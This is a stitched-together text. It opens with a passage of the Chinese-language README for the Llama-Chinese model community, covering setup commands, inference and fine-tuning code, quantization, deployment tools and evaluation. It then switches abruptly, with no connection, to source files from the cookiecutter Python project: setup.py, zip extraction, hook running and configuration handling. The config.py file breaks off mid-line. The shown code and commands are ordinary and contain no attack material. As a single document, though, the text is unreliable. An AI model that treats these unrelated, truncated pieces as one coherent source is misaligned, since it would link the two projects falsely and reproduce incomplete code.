|[HuggingFace](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat-LoRA) | ### 社区资源 社区资源的丰富性是社区发展的重要保障,它涵盖了各种方面,其中包括但不限于以下四个方面:算力、数据、论坛和应用。在这些方面的积极发展与充分利用,将为社区成员提供更多的机会和支持,推动整个社区向着更加繁荣的方向发展。更多的内容请看[llama.family](https://llama.family/) <details> #### 💻 算力 - 提供低于市场价格的算力资源,可用于各类计算任务,如深度学习模型的训练、推理等。 - 为社区成员提供专属的在线推理服务,让用户可以快速有效地对模型进行推理操作。 - 提供一键在线微调服务,使用户可以方便地对模型进行微调,以适应不同的任务和数据。 #### 📊 数据 - 开放丰富的训练数据资源,覆盖多个领域和行业,为模型训练提供充足的数据支持。 - 提供高质量、多样化的数据集,以满足不同用户的需求,并支持数据共享和交流,促进数据资源的充分利用。 #### 💬 论坛 - 社区论坛为社区成员提供了一个在线交流和讨论技术问题的平台。 - 在论坛上,用户可以分享经验、提出问题、解答疑惑,促进技术交流和合作。 - 论坛还可以定期举办线上活动、研讨会等,增进社区成员之间的联系和了解。 #### 📱 应用 - 免费提供应用推广展示位,让开发者可以将他们的应用充分展示给社区成员。 - 提供推广的帮助,包括但不限于宣传推广、用户引导等服务,帮助应用获得更多的曝光和用户。 - 通过社区平台,为优秀的应用提供合作机会,促进应用开发者之间的合作和交流,共同推动应用的发展和壮大。 </details> ## 📌 如何使用Llama模型? 你可以选择下面的快速上手的任一种方式,开始使用 Llama 系列模型。推荐使用[中文预训练对话模型](#llama2中文预训练模型atom-7b)进行使用,对中文的效果支持更好。 ### 快速上手-使用Anaconda 第 0 步:前提条件 - 确保安装了 Python 3.10 以上版本。 第 1 步:准备环境 如需设置环境,安装所需要的软件包,运行下面的命令。 ```bash git clone https://github.com/LlamaFamily/Llama-Chinese.git cd Llama-Chinese pip install -r requirements.txt ``` 第 2 步:下载模型 你可以从以下来源下载Atom-7B-Chat模型。 - [HuggingFace](https://huggingface.co/FlagAlpha) - [ModelScope](https://modelscope.cn/organization/FlagAlpha) - [WiseModel](https://wisemodel.cn/models/FlagAlpha/Atom-7B-Chat) 第 3 步:进行推理 使用Atom-7B-Chat模型进行推理 创建一个名为 quick_start.py 的文件,并将以下内容复制到该文件中。 ```python import torch from transformers import AutoTokenizer, AutoModelForCausalLM device_map = "cuda:0" if torch.cuda.is_available() else "auto" model = AutoModelForCausalLM.from_pretrained('FlagAlpha/Atom-7B-Chat',device_map=device_map,torch_dtype=torch.float16,load_in_8bit=True,trust_remote_code=True,use_flash_attention_2=True) model =model.eval() tokenizer = AutoTokenizer.from_pretrained('FlagAlpha/Atom-7B-Chat',use_fast=False) tokenizer.pad_token = tokenizer.eos_token input_ids = tokenizer(['<s>Human: 介绍一下中国\n</s><s>Assistant: '], return_tensors="pt",add_special_tokens=False).input_ids if torch.cuda.is_available(): input_ids = input_ids.to('cuda') generate_input = { "input_ids":input_ids, "max_new_tokens":512, "do_sample":True, "top_k":50, "top_p":0.95, "temperature":0.3, "repetition_penalty":1.3, "eos_token_id":tokenizer.eos_token_id, "bos_token_id":tokenizer.bos_token_id, "pad_token_id":tokenizer.pad_token_id } generate_ids = model.generate(**generate_input) text = tokenizer.decode(generate_ids[0]) print(text) ``` 运行 quick_start.py 代码。 ```bash python quick_start.py ``` ### 快速上手-使用Docker 详情参见:[Docker部署](https://github.com/LlamaFamily/Llama-Chinese/blob/main/docs/chat_gradio_guide.md) 第 1 步:准备docker镜像,通过docker容器启动[chat_gradio.py](../examples/chat_gradio.py) ```bash git clone https://github.com/LlamaFamily/Llama-Chinese.git cd Llama-Chinese docker build -f docker/Dockerfile -t flagalpha/llama2-chinese:gradio . ``` 第 2 步:通过docker-compose启动chat_gradio ```bash cd Llama-Chinese/docker docker-compose up -d --build ``` ### 快速上手-使用llama.cpp 详情参见:[使用llama.cpp](https://github.com/LlamaFamily/Llama-Chinese/blob/main/inference-speed/CPU/ggml/README.md) ### 快速上手-使用gradio 基于gradio搭建的问答界面,实现了流式的输出,将下面代码复制到控制台运行,以下代码以Atom-7B-Chat模型为例,不同模型只需修改一下面的model_name_or_path对应的模型名称就好了😊 ``` python examples/chat_gradio.py --model_name_or_path FlagAlpha/Atom-7B-Chat ``` ### 快速上手-构建API服务 使用FastChat构建和OpenAI一致的推理服务接口。 <details> 第 0 步:前提条件 安装fastchat ```bash pip3 install "fschat[model_worker,webui]" ``` 第 1 步:启动Restful API 开启三个控制台分别执行下面的三个命令 - 首先启动controler ```bash python3 -m fastchat.serve.controller \ --host localhost \ --port 21001 ``` - 启动模型 ```bash CUDA_VISIBLE_DEVICES="0" python3 -m fastchat.serve.model_worker --model-path /path/Atom-7B-Chat \ --host localhost \ --port 21002 \ --worker-address "http://localhost:21002" \ --limit-worker-concurrency 5 \ --stream-interval 2 \ --gpus "1" \ --load-8bit ``` - 启动RESTful API 服务 ```bash python3 -m fastchat.serve.openai_api_server \ --host localhost \ --port 21003 \ --controller-address http://localhost:21001 ``` 第 2 步:测试api服务 执行下面的python代码测试上面部署的api服务 ```python # coding=utf-8 import json import time import urllib.request import sys import requests def test_api_server(input_text): header = {'Content-Type': 'application/json'} data = { "messages": [{"role": "system", "content": ""}, {"role": "user", "content": input_text}], "temperature": 0.3, "top_p" : 0.95, "max_tokens": 512, "model": "LLama2-Chinese-13B", "stream" : False, "n" : 1, "best_of": 1, "presence_penalty": 1.2, "frequency_penalty": 0.2, "top_k": 50, "use_beam_search": False, "stop": [], "ignore_eos" :False, "logprobs": None } response = requests.post( url='http://127.0.0.1:21003/v1/chat/completions', headers=header, data=json.dumps(data).encode('utf-8') ) result = None try: result = json.loads(response.content) print(json.dumps(data, ensure_ascii=False, indent=2)) print(json.dumps(result, ensure_ascii=False, indent=2)) except Exception as e: print(e) return result if __name__ == "__main__": test_api_server("如何去北京?") ``` </details> ### 快速上手-使用ollama运行 1. 首先需要安装ollama工具 安装方法参考:[https://ollama.com](https://ollama.com/) 2. ollama运行Llama3-Chinese-8B-Instruct、Atom-7B-Chat ollama运行基于Llama3进行中文微调的大模型[Llama3-Chinese-8B-Instruct](https://huggingface.co/FlagAlpha/Llama3-Chinese-8B-Instruct) 打开命令行执行命令 ``` ollama run llamafamily/llama3-chinese-8b-instruct ``` ollama运行基于Llama2进行中文预训练的开源大模型[Atom-7B-Chat](https://huggingface.co/FlagAlpha/Atom-7B-Chat) 打开命令行执行命令 ``` ollama run llamafamily/atom-7b-chat ``` ## 🤖 模型预训练 虽然Llama2的预训练数据相对于第一代LLaMA扩大了一倍,但是中文预训练数据的比例依然非常少,仅占0.13%,这也导致了原始Llama2的中文能力较弱。为了能够提升模型的中文能力,可以采用微调和预训练两种路径,其中: - 微调需要的算力资源少,能够快速实现一个中文Llama的雏形。但缺点也显而易见,只能激发基座模型已有的中文能力,由于Llama2的中文训练数据本身较少,所以能够激发的能力也有限,治标不治本。 - 基于大规模中文语料进行预训练,成本高,不仅需要大规模高质量的中文数据,也需要大规模的算力资源。但是优点也显而易见,就是能从模型底层优化中文能力,真正达到治本的效果,从内核为大模型注入强大的中文能力。 我们为社区提供了Llama模型的预训练代码,以及[中文测试语料](https://github.com/LlamaFamily/Llama-Chinese/tree/main/data),更多数据可以参考[中文语料](#-中文数据)。具体代码和配置如下: - 模型预训练脚本:[train/pretrain/pretrain.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/pretrain.sh) - 预训练实现代码:[train/pretrain/pretrain_clm.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/pretrain_clm.py) - [DeepSpeed](https://github.com/microsoft/DeepSpeed)加速: - 对于单卡训练,可以采用ZeRO-2的方式,参数配置见 [train/pretrain/ds_config_zero2.json](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/ds_config_zero2.json) - 对于多卡训练,可以采用ZeRO-3的方式,参数配置见 [train/pretrain/ds_config_zero3.json](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/ds_config_zero3.json) - 训练效果度量指标:[train/pretrain/accuracy.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/pretrain/accuracy.py) ## 💡 模型微调 本仓库中同时提供了LoRA微调和全量参数微调代码,关于LoRA的详细介绍可以参考论文“[LoRA: Low-Rank Adaptation of Large Language Models](https://arxiv.org/abs/2106.09685)”以及微软Github仓库[LoRA](https://github.com/microsoft/LoRA)。 ### Step1: 环境准备 根据[requirements.txt](https://github.com/LlamaFamily/Llama-Chinese/blob/main/requirements.txt)安装对应的环境依赖。 ### Step2: 数据准备 在data目录下提供了一份用于模型sft的数据样例: - 训练数据:[data/train_sft.csv](https://github.com/LlamaFamily/Llama-Chinese/blob/main/data/train_sft.csv) - 验证数据:[data/dev_sft.csv](https://github.com/LlamaFamily/Llama-Chinese/blob/main/data/dev_sft.csv) 每个csv文件中包含一列“text”,每一行为一个训练样例,每个训练样例按照以下格式将问题和答案组织为模型输入,您可以按照以下格式自定义训练和验证数据集: ``` "<s>Human: "+问题+"\n</s><s>Assistant: "+答案+"\n"</s> ``` 例如, ``` <s>Human: 用一句话描述地球为什么是独一无二的。</s><s>Assistant: 因为地球是目前为止唯一已知存在生命的行星。</s> ``` ### Step3: 微调脚本 #### LoRA微调 LoRA微调脚本见:[train/sft/finetune_lora.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_lora.sh),关于LoRA微调的具体实现代码见[train/sft/finetune_clm_lora.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_clm_lora.py),单机多卡的微调可以通过修改脚本中的`--include localhost:0`来实现。 #### 全量参数微调 全量参数微调脚本见:[train/sft/finetune.sh](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune.sh),关于全量参数微调的具体实现代码见[train/sft/finetune_clm.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/train/sft/finetune_clm.py)。 ### Step4: 加载微调模型 #### LoRA微调 基于LoRA微调的模型参数见:[基于Llama2的中文微调模型](#llama2中文微调模型),LoRA参数需要和基础模型参数结合使用。 通过[PEFT](https://github.com/huggingface/peft)加载预训练模型参数和微调模型参数,以下示例代码中,base_model_name_or_path为预训练模型参数保存路径,finetune_model_path为微调模型参数保存路径。 ```python import torch from transformers import AutoTokenizer, AutoModelForCausalLM from peft import PeftModel,PeftConfig # 例如: finetune_model_path='FlagAlpha/Llama2-Chinese-7b-Chat-LoRA' finetune_model_path='' config = PeftConfig.from_pretrained(finetune_model_path) # 例如: base_model_name_or_path='meta-llama/Llama-2-7b-chat' tokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path,use_fast=False) tokenizer.pad_token = tokenizer.eos_token device_map = "cuda:0" if torch.cuda.is_available() else "auto" model = AutoModelForCausalLM.from_pretrained(config.base_model_name_or_path,device_map=device_map,torch_dtype=torch.float16,load_in_8bit=True,trust_remote_code=True,use_flash_attention_2=True) model = PeftModel.from_pretrained(model, finetune_model_path, device_map={"": 0}) model =model.eval() input_ids = tokenizer(['<s>Human: 介绍一下北京\n</s><s>Assistant: '], return_tensors="pt",add_special_tokens=False).input_ids if torch.cuda.is_available(): input_ids = input_ids.to('cuda') generate_input = { "input_ids":input_ids, "max_new_tokens":512, "do_sample":True, "top_k":50, "top_p":0.95, "temperature":0.3, "repetition_penalty":1.3, "eos_token_id":tokenizer.eos_token_id, "bos_token_id":tokenizer.bos_token_id, "pad_token_id":tokenizer.pad_token_id } generate_ids = model.generate(**generate_input) text = tokenizer.decode(generate_ids[0]) print(text) ``` #### 全量参数微调 对于全量参数微调的模型,调用方式同[模型调用代码示例](#模型调用代码示例),只需要修改其中的模型名称或者保存路径即可。 ## 🍄 模型量化 我们对中文微调的模型参数进行了量化,方便以更少的计算资源运行。目前已经在[Hugging Face](https://huggingface.co/FlagAlpha)上传了13B中文微调模型[FlagAlpha/Llama2-Chinese-13b-Chat](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat)的4bit压缩版本[FlagAlpha/Llama2-Chinese-13b-Chat-4bit](https://huggingface.co/FlagAlpha/Llama2-Chinese-13b-Chat-4bit),具体调用方式如下: 环境准备: ``` pip install git+https://github.com/PanQiWei/AutoGPTQ.git ``` ```python from transformers import AutoTokenizer from auto_gptq import AutoGPTQForCausalLM model = AutoGPTQForCausalLM.from_quantized('FlagAlpha/Llama2-Chinese-13b-Chat-4bit', device="cuda:0") tokenizer = AutoTokenizer.from_pretrained('FlagAlpha/Llama2-Chinese-13b-Chat-4bit',use_fast=False) input_ids = tokenizer(['<s>Human: 怎么登上火星\n</s><s>Assistant: '], return_tensors="pt",add_special_tokens=False).input_ids.to('cuda') generate_input = { "input_ids":input_ids, "max_new_tokens":512, "do_sample":True, "top_k":50, "top_p":0.95, "temperature":0.3, "repetition_penalty":1.3, "eos_token_id":tokenizer.eos_token_id, "bos_token_id":tokenizer.bos_token_id, "pad_token_id":tokenizer.pad_token_id } generate_ids = model.generate(**generate_input) text = tokenizer.decode(generate_ids[0]) print(text) ``` ## 🚀 部署加速 随着大模型参数规模的不断增长,在有限的算力资源下,提升模型的推理速度逐渐变为一个重要的研究方向。常用的推理加速框架包含 lmdeploy、TensorRT-LLM、vLLM和JittorLLMs 等。 ### TensorRT-LLM [TensorRT-LLM](https://github.com/NVIDIA/TensorRT-LLM/tree/main)由NVIDIA开发,高性能推理框架 详细的推理文档见:[inference-speed/GPU/TensorRT-LLM_example](https://github.com/LlamaFamily/Llama-Chinese/tree/main/inference-speed/GPU/TensorRT-LLM_example) ### vLLM [vLLM](https://github.com/vllm-project/vllm)由加州大学伯克利分校开发,核心技术是PageAttention,吞吐量比HuggingFace Transformers高出24倍。相较与FasterTrainsformer,vLLM更加的简单易用,不需要额外进行模型的转换,支持fp16推理。 详细的推理文档见:[inference-speed/GPU/vllm_example](https://github.com/LlamaFamily/Llama-Chinese/blob/main/inference-speed/GPU/vllm_example/README.md) ### JittorLLMs [JittorLLMs](https://github.com/Jittor/JittorLLMs)由非十科技领衔,与清华大学可视媒体研究中心合作研发,通过动态swap机制大幅降低硬件配置要求(减少80%),并且Jittor框架通过零拷贝技术,大模型加载相比Pytorch开销降低40%,同时,通过元算子自动编译优化,计算性能提升20%以上。 详细的推理文档见:[inference-speed/GPU/JittorLLMs](https://github.com/LlamaFamily/Llama-Chinese/blob/main/inference-speed/GPU/JittorLLMs_example/README.md) ### lmdeploy [lmdeploy](https://github.com/InternLM/lmdeploy/) 由上海人工智能实验室开发,推理使用 C++/CUDA,对外提供 python/gRPC/http 接口和 WebUI 界面,支持 tensor parallel 分布式推理、支持 fp16/weight int4/kv cache int8 量化。 详细的推理文档见:[inference-speed/GPU/lmdeploy_example](https://github.com/LlamaFamily/Llama-Chinese/tree/main/inference-speed/GPU/lmdeploy_example) ## 💪 外延能力 除了持续增强大模型内在的知识储备、通用理解、逻辑推理和想象能力等,未来,我们也会不断丰富大模型的外延能力,例如知识库检索、计算工具、WolframAlpha、操作软件等。 我们首先集成了LangChain框架,可以更方便地基于Llama2开发文档检索、问答机器人和智能体应用等,关于LangChain的更多介绍参见[LangChain](https://github.com/langchain-ai/langchain)。 ### LangChain 针对LangChain框架封装的Llama2 LLM类见[examples/llama2_for_langchain.py](https://github.com/LlamaFamily/Llama-Chinese/blob/main/examples/llama2_for_langchain.py),简单的调用代码示例如下: ```python from llama2_for_langchain import Llama2 # 这里以调用FlagAlpha/Atom-7B-Chat为例 llm = Llama2(model_name_or_path='FlagAlpha/Atom-7B-Chat') while True: human_input = input("Human: ") response = llm(human_input) print(f"Llama2: {response}") ``` ## 🥇 模型评测 ### Llama2和Llama3对比评测 基础模型对比 <p align="center" width="100%"> <img src="./assets/base_eval.png" style="width: 100%; display: block; margin: auto;"> </p> 微调模型对比 <p align="center" width="100%"> <img src="./assets/tuned_eval.png" style="width: 100%; display: block; margin: auto;"> </p> ### Llama3模型评测 <p align="center" width="100%"> <img src="./assets/llama3_eval.png" style="width: 100%; display: block; margin: auto;"> </p> ### Llama2模型评测 <p align="center" width="100%"> <img src="./assets/llama_eval.jpeg" style="width: 100%; display: block; margin: auto;"> </p> 为了能够更加清晰地了解Llama2模型的中文问答能力,我们筛选了一些具有代表性的中文问题,对Llama2模型进行提问。我们测试的模型包含Meta公开的Llama2-7B-Chat和Llama2-13B-Chat两个版本,没有做任何微调和训练。测试问题筛选自[AtomBulb](https://github.com/AtomEcho/AtomBulb),共95个测试问题,包含:通用知识、语言理解、创作能力、逻辑推理、代码编程、工作技能、使用工具、人格特征八个大的类别。 测试中使用的Prompt如下,例如对于问题“列出5种可以改善睡眠质量的方法”: ``` [INST] <<SYS>> You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature. The answer always been translate into Chinese language. If a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information. The answer always been translate into Chinese language. <</SYS>> 列出5种可以改善睡眠质量的方法 [/INST] ``` Llama2-7B-Chat的测试结果见[meta_eval_7B.md](assets/meta_eval_7B.md),Llama2-13B-Chat的测试结果见[meta_eval_13B.md](assets/meta_eval_13B.md)。 通过测试我们发现,Meta原始的Llama2 Chat模型对于中文问答的对齐效果一般,大部分情况下都不能给出中文回答,或者是中英文混杂的形式。因此,基于中文数据对Llama2模型进行训练和微调十分必要。 ## 📖 学习中心 ### 官方文档 Meta Llama全系列模型官方文档:https://llama.meta.com/docs/get-started ### Llama3 [Llama3全套学习资料](https://chinesellama.feishu.cn/wiki/XBKPwbhWriWCfrkmJhfcrS9Rnqc?fromScene=spaceOverview) Llama3官方链接:https://llama.meta.com/llama3 ### Llama2 #### Meta官方对于[Llama2](https://ai.meta.com/llama)的介绍 自从Meta公司发布第一代LLaMA模型以来,羊驼模型家族繁荣发展。近期Meta发布了Llama2版本,开源可商用,在模型和效果上有了重大更新。Llama2总共公布了7B、13B和70B三种参数大小的模型。相比于LLaMA,Llama2的训练数据达到了2万亿token,上下文长度也由之前的2048升级到4096,可以理解和生成更长的文本。Llama2 Chat模型基于100万人类标记数据微调得到,在英文对话上达到了接近ChatGPT的效果。 ### Llama相关论文 * [LLaMA: Open and Efficient Foundation Language Models](https://arxiv.org/abs/2302.13971) * [Llama 2: Open Foundation and Fine-Tuned Chat Models](https://arxiv.org/abs/2307.09288) * [Code Llama: Open Foundation Models for Code](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/) ## 📌 其它 ### 🎉 致谢 感谢原子回声[AtomEcho](https://github.com/AtomEcho)团队的技术和资源支持! 感谢芯格[Coremesh](https://coremesh.net)团队的技术和资源支持! 感谢 [福州连天教育科技有限公司](www.3class.cc) 对Llama中文社区的贡献! 感谢 @Z Potentials社区对Llama中文社区的支持! ### 🤔 问题反馈 如有问题,请在GitHub Issue中提交,在提交问题之前,请先查阅以往的issue是否能解决你的问题。 礼貌地提出问题,构建和谐的讨论社区。 加入[飞书知识库](https://chinesellama.feishu.cn/wiki/space/7257824476874768388?ccm_open_type=lark_wiki_spaceLink),一起共建社区文档。 加入微信群讨论😍😍 <p align="center" width="100%"> <img src="./assets/wechat-new.jpeg" alt="Wechat" style="width: 100%; display: block; margin: auto;"> </p> <p align="center" width="100%"> <img src="https://api.star-history.com/svg?repos=LlamaFamily/Llama-Chinese&type=Date" alt="Star" style="width: 100%; display: block; margin: auto;"> </p>
cookiecutter
b4451231809fb9e4fc2a1e95d433cb030e4b9e06
File: setup.py """cookiecutter distutils configuration.""" from pathlib import Path from setuptools import setup def _get_version() -> str: """Read cookiecutter/VERSION.txt and return its contents.""" path = Path("cookiecutter").resolve() version_file = path / "VERSION.txt" return version_file.read_text().strip() version = _get_version() readme = Path('README.md').read_text(encoding='utf-8') requirements = [ 'binaryornot>=0.4.4', 'Jinja2>=2.7,<4.0.0', 'click>=7.0,<9.0.0', 'pyyaml>=5.3.1', 'python-slugify>=4.0.0', 'requests>=2.23.0', 'arrow', 'rich', ] setup( name='cookiecutter', version=version, description=( 'A command-line utility that creates projects from project ' 'templates, e.g. creating a Python package project from a ' 'Python package project template.' ), long_description=readme, long_description_content_type='text/markdown', author='Audrey Feldroy', author_email='[email protected]', url='https://github.com/cookiecutter/cookiecutter', project_urls={ "Documentation": "https://cookiecutter.readthedocs.io", "Issues": "https://github.com/cookiecutter/cookiecutter/issues", "Discord": "https://discord.gg/9BrxzPKuEW", }, packages=['cookiecutter'], package_dir={'cookiecutter': 'cookiecutter'}, entry_points={'console_scripts': ['cookiecutter = cookiecutter.__main__:main']}, include_package_data=True, python_requires='>=3.8', install_requires=requirements, license='BSD', zip_safe=False, classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Natural Language :: English", "License :: OSI Approved :: BSD License", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", "Programming Language :: Python", "Topic :: Software Development", ], keywords=[ "cookiecutter", "Python", "projects", "project templates", "Jinja2", "skeleton", "scaffolding", "project directory", "package", "packaging", ], ) File: __main__.py """Allow cookiecutter to be executable from a checkout or zip file.""" import runpy if __name__ == "__main__": runpy.run_module("cookiecutter", run_name="__main__") File: cookiecutter/zipfile.py """Utility functions for handling and fetching repo archives in zip format.""" from __future__ import annotations import os import tempfile from pathlib import Path from zipfile import BadZipFile, ZipFile import requests from cookiecutter.exceptions import InvalidZipRepository from cookiecutter.prompt import prompt_and_delete, read_repo_password from cookiecutter.utils import make_sure_path_exists def unzip( zip_uri: str, is_url: bool, clone_to_dir: Path | str = ".", no_input: bool = False, password: str | None = None, ) -> str: """Download and unpack a zipfile at a given URI. This will download the zipfile to the cookiecutter repository, and unpack into a temporary directory. :param zip_uri: The URI for the zipfile. :param is_url: Is the zip URI a URL or a file? :param clone_to_dir: The cookiecutter repository directory to put the archive into. :param no_input: Do not prompt for user input and eventually force a refresh of cached resources. :param password: The password to use when unpacking the repository. """ # Ensure that clone_to_dir exists clone_to_dir = Path(clone_to_dir).expanduser() make_sure_path_exists(clone_to_dir) if is_url: # Build the name of the cached zipfile, # and prompt to delete if it already exists. identifier = zip_uri.rsplit('/', 1)[1] zip_path = os.path.join(clone_to_dir, identifier) if os.path.exists(zip_path): download = prompt_and_delete(zip_path, no_input=no_input) else: download = True if download: # (Re) download the zipfile r = requests.get(zip_uri, stream=True, timeout=100) with open(zip_path, 'wb') as f: for chunk in r.iter_content(chunk_size=1024): if chunk: # filter out keep-alive new chunks f.write(chunk) else: # Just use the local zipfile as-is. zip_path = os.path.abspath(zip_uri) # Now unpack the repository. The zipfile will be unpacked # into a temporary directory try: zip_file = ZipFile(zip_path) if len(zip_file.namelist()) == 0: msg = f'Zip repository {zip_uri} is empty' raise InvalidZipRepository(msg) # The first record in the zipfile should be the directory entry for # the archive. If it isn't a directory, there's a problem. first_filename = zip_file.namelist()[0] if not first_filename.endswith('/'): msg = f"Zip repository {zip_uri} does not include a top-level directory" raise InvalidZipRepository(msg) # Construct the final target directory project_name = first_filename[:-1] unzip_base = tempfile.mkdtemp() unzip_path = os.path.join(unzip_base, project_name) # Extract the zip file into the temporary directory try: zip_file.extractall(path=unzip_base) except RuntimeError as runtime_err: # File is password protected; try to get a password from the # environment; if that doesn't work, ask the user. if password is not None: try: zip_file.extractall(path=unzip_base, pwd=password.encode('utf-8')) except RuntimeError as e: msg = 'Invalid password provided for protected repository' raise InvalidZipRepository(msg) from e elif no_input: msg = 'Unable to unlock password protected repository' raise InvalidZipRepository(msg) from runtime_err else: retry: int | None = 0 while retry is not None: try: password = read_repo_password('Repo password') zip_file.extractall( path=unzip_base, pwd=password.encode('utf-8') ) retry = None except RuntimeError as e: # noqa: PERF203 retry += 1 # type: ignore[operator] if retry == 3: msg = 'Invalid password provided for protected repository' raise InvalidZipRepository(msg) from e except BadZipFile as e: msg = f'Zip repository {zip_uri} is not a valid zip archive:' raise InvalidZipRepository(msg) from e return unzip_path File: cookiecutter/hooks.py """Functions for discovering and executing various cookiecutter hooks.""" from __future__ import annotations import errno import logging import os import subprocess import sys import tempfile from pathlib import Path from typing import Any from jinja2.exceptions import UndefinedError from cookiecutter import utils from cookiecutter.exceptions import FailedHookException from cookiecutter.utils import ( create_env_with_context, create_tmp_repo_dir, rmtree, work_in, ) logger = logging.getLogger(__name__) _HOOKS = [ 'pre_prompt', 'pre_gen_project', 'post_gen_project', ] EXIT_SUCCESS = 0 def valid_hook(hook_file: str, hook_name: str) -> bool: """Determine if a hook file is valid. :param hook_file: The hook file to consider for validity :param hook_name: The hook to find :return: The hook file validity """ filename = os.path.basename(hook_file) basename = os.path.splitext(filename)[0] matching_hook = basename == hook_name supported_hook = basename in _HOOKS backup_file = filename.endswith('~') return matching_hook and supported_hook and not backup_file def find_hook(hook_name: str, hooks_dir: str = 'hooks') -> list[str] | None: """Return a dict of all hook scripts provided. Must be called with the project template as the current working directory. Dict's key will be the hook/script's name, without extension, while values will be the absolute path to the script. Missing scripts will not be included in the returned dict. :param hook_name: The hook to find :param hooks_dir: The hook directory in the template :return: The absolute path to the hook script or None """ logger.debug('hooks_dir is %s', os.path.abspath(hooks_dir)) if not os.path.isdir(hooks_dir): logger.debug('No hooks/dir in template_dir') return None scripts = [ os.path.abspath(os.path.join(hooks_dir, hook_file)) for hook_file in os.listdir(hooks_dir) if valid_hook(hook_file, hook_name) ] if len(scripts) == 0: return None return scripts def run_script(script_path: str, cwd: Path | str = '.') -> None: """Execute a script from a working directory. :param script_path: Absolute path to the script to run. :param cwd: The directory to run the script from. """ run_thru_shell = sys.platform.startswith('win') if script_path.endswith('.py'): script_command = [sys.executable, script_path] else: script_command = [script_path] utils.make_executable(script_path) try: proc = subprocess.Popen(script_command, shell=run_thru_shell, cwd=cwd) # nosec exit_status = proc.wait() if exit_status != EXIT_SUCCESS: msg = f'Hook script failed (exit status: {exit_status})' raise FailedHookException(msg) except OSError as err: if err.errno == errno.ENOEXEC: msg = 'Hook script failed, might be an empty file or missing a shebang' raise FailedHookException(msg) from err msg = f'Hook script failed (error: {err})' raise FailedHookException(msg) from err def run_script_with_context( script_path: Path | str, cwd: Path | str, context: dict[str, Any] ) -> None: """Execute a script after rendering it with Jinja. :param script_path: Absolute path to the script to run. :param cwd: The directory to run the script from. :param context: Cookiecutter project template context. """ _, extension = os.path.splitext(script_path) contents = Path(script_path).read_text(encoding='utf-8') with tempfile.NamedTemporaryFile(delete=False, mode='wb', suffix=extension) as temp: env = create_env_with_context(context) template = env.from_string(contents) output = template.render(**context) temp.write(output.encode('utf-8')) run_script(temp.name, cwd) def run_hook(hook_name: str, project_dir: Path | str, context: dict[str, Any]) -> None: """ Try to find and execute a hook from the specified project directory. :param hook_name: The hook to execute. :param project_dir: The directory to execute the script from. :param context: Cookiecutter project context. """ scripts = find_hook(hook_name) if not scripts: logger.debug('No %s hook found', hook_name) return logger.debug('Running hook %s', hook_name) for script in scripts: run_script_with_context(script, project_dir, context) def run_hook_from_repo_dir( repo_dir: Path | str, hook_name: str, project_dir: Path | str, context: dict[str, Any], delete_project_on_failure: bool, ) -> None: """Run hook from repo directory, clean project directory if hook fails. :param repo_dir: Project template input directory. :param hook_name: The hook to execute. :param project_dir: The directory to execute the script from. :param context: Cookiecutter project context. :param delete_project_on_failure: Delete the project directory on hook failure? """ with work_in(repo_dir): try: run_hook(hook_name, project_dir, context) except ( FailedHookException, UndefinedError, ): if delete_project_on_failure: rmtree(project_dir) logger.exception( "Stopping generation because %s hook " "script didn't exit successfully", hook_name, ) raise def run_pre_prompt_hook(repo_dir: Path | str) -> Path | str: """Run pre_prompt hook from repo directory. :param repo_dir: Project template input directory. """ # Check if we have a valid pre_prompt script with work_in(repo_dir): scripts = find_hook('pre_prompt') if not scripts: return repo_dir # Create a temporary directory repo_dir = create_tmp_repo_dir(repo_dir) with work_in(repo_dir): scripts = find_hook('pre_prompt') or [] for script in scripts: try: run_script(script, str(repo_dir)) except FailedHookException as e: # noqa: PERF203 msg = 'Pre-Prompt Hook script failed' raise FailedHookException(msg) from e return repo_dir File: cookiecutter/config.py """Global configuration handling.""" from __future__ import annotations import collections import copy import logging import os from typing import TYPE_CHECKING, Any import yaml from cookiecutter.exceptions import ConfigDoesNotExistException, InvalidConfiguration if TYPE_CHECKING: from pathlib import Path logger = logging.getLogger(__name__) USER_CONFIG_PATH = os.path.expanduser('~/.cookiecutterrc') BUILTIN_ABBREVIATIONS = { 'gh': 'https://github.com/{0}.git', 'gl': 'https://gitlab.com/{0}.git', 'bb': 'https://bitbucket.org/{0}', } DEFAULT_CONFIG = { 'cookiecutters_dir': os.path.expanduser('~/.cookiecutters/'), 'replay_dir': os.path.expanduser('~/.cookiecutter_replay/'), 'default_context': collections.OrderedDict([]), 'abbreviations': BUILTIN_ABBREVIATIONS, } def _expand_path(path: str) -> str: """Expand both environment variables and user home in the given path.""" path = os.path.expandvars(path) return os.path.expanduser(path) def merge_configs(default: dict[str, Any], overwrite: dict[str, Any]) -> dict[str, Any]: """Recursively update a dict with the key/value pair of another. Dict values that are dictionaries themselves will be updated, whilst preserving existing keys. """ new_config = copy.deepcopy(default) for k, v in overwrite.items(): # Make sure to preserve existing items in # nested dicts, for example `abbreviations` if isinstance(v, dict): new_config[k] = merge_configs(default.get(k, {}), v) else: new_config[k] = v return new_config def get_config(config_path: Path | str) -> dict[str, Any]: """Retrieve the config from the specified path, returning a config dict.""" if not os.path.exists(config_path): msg = f'Config file {config_path} does not exist.' raise 